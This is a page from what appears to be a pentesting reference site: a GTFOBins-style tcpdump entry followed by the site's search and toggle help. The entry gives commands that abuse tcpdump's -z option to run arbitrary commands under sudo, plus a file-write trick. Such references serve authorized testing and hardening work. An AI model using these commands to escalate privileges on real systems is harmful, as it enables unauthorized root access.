tcpdump

Command Execution

Context: sudo, unprivileged

echo /path/to/command >/path/to/temp-file
chmod +x /path/to/temp-file
tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /path/to/temp-file

Context: sudo, unprivileged

tcpdump -ln -i lo -w 'command-argument' -W 1 -G 1 -z /path/to/command

File Write

Context: sudo, suid, unprivileged

tcpdump -ln -i lo -w /path/to/output-file -c 1 -Z user

Set Variables

Values apply to all code blocks on this page and persist across pages in this session.

Search & Navigation Guide

Ctrl+KOpen search from anywhere on the page

↑ ↓Move through results

EnterOpen the highlighted result

EscClose search

Searches all sources at once. The source name appears as a coloured tag on each result.

Filtering Search by Source

The coloured badges across the top bar (BloodHound, HackTricks, GTFOBins, etc.) are toggle buttons that narrow search to a single source.

① Click a badge— restricts all results to that source only

② Click it again— deselects it, search returns to all sources

Only one source filter is active at a time. The active badge glows in its source colour. The search box placeholder updates to reflect which source is active.

BloodHound Edge Search

On the BloodHound page the edge search uses prefix matching — type Owns to find the Owns edge only, not AZOwns. Type AZ to see all Azure edges.
Switch to Collectors to pick SharpHound / BloodHound-Python / RustHound and see that collector's syntax inline.

Variables

Click Variables in the sidebar to fill placeholders like <domain>, <dc-ip>, <password> across every code block on the page. Values carry over between pages for the whole session. Edit All lets you update every saved value at once. Clear resets them all.

Distro Toggle

Controls the command style used in impacket code blocks.
Kali — impacket-secretsdump
Exegol — secretsdump.py
Script — python3 secretsdump.py

Tools Toggle (Impacket / GoPacket)

Switches between the Python impacket toolkit and its Go equivalent.
Impacket — standard Python tools, sidebar shows the Impacket reference
GoPacket — replaces every impacket- / secretsdump.py / python3 … with gopacket-secretsdump style, sidebar switches to the GoPacket reference. Distro selection is ignored when GoPacket is active.